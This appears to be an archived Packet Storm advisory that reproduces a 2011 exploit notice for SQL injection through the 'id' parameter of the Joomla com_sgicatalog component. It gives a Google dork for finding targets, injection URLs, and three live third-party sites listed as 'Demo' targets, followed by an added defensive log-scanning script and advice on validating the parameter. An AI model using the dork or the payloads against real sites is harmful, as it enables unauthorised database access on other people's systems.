Joomla Sgicatalog SQL Injection

2011-10-12T00:00:00
ID PACKETSTORM:105704
Type packetstorm
Reporter BHG Security Center
Modified 2011-10-12T00:00:00

Description

                                        
                                            `  
####  
# Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability   
# Google Dork: inurl:index.php?option=com_sgicatalog  
# Date: 2011-10-12  
# Author: BHG Security Center  
# Home: Http://black-hg.org  
# Software Link: http://joomlaapps.com/  
# Version: 1.x  
# Tested on: [Windows XP- Persian]  
# CVE : Webapps  
####  
  
  
  
[*] ExpLo!T :  
  
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]  
  
http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]  
  
[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
####  
  
[+] Peace From #BHG  
  
Vuln Component : com_sgicatalog  
  
Error: SQL injection in the Joomla component (com_sgicatalog)  
  
Vulnerable parameter: id (as in lang=en&id=)  
  
####  
  
=================================**BHG Security Center**=====================================|  
# Greets To : |  
|  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |  
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |  
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |   
============================================================================================ |  
`
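
A defender-side check for the issue above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to `com_sgicatalog` whose `id` value is not a plain integer. The log lines are constructed samples, and the function name, the combined log format, and the rule that a legitimate `id` is a non-negative integer are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=416 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [12/Oct/2011:10:00:05 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=-416' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
192.0.2.12 - - [12/Oct/2011:10:00:09 +0000] "GET /path/index.php?option=com_sgicatalog&task=view&lang=en&id=416%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
192.0.2.13 - - [12/Oct/2011:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=7:news HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.14 - - [12/Oct/2011:10:00:15 +0000] "GET /index.php?id=1&id=2%20x&option=com_sgicatalog HTTP/1.1" 200 100 "-" "curl/7.21"
"""

# client address, request target and status code from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# Assumption: a legitimate catalog id is a short non-negative integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text, component="com_sgicatalog"):
    """Return (client, status, bad_id_values) for each request to the component with a non-integer id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qs percent-decodes values and keeps every copy of a repeated parameter
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if component not in params.get("option", []):
            continue
        bad = [v for v in params.get("id", []) if not VALID_ID.fullmatch(v)]
        if bad:
            hits.append((client, int(status), bad))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list rule (cast or validate `id` as an integer before it reaches the query) is the fix on the application side; the log check only tells you whether the parameter has been probed.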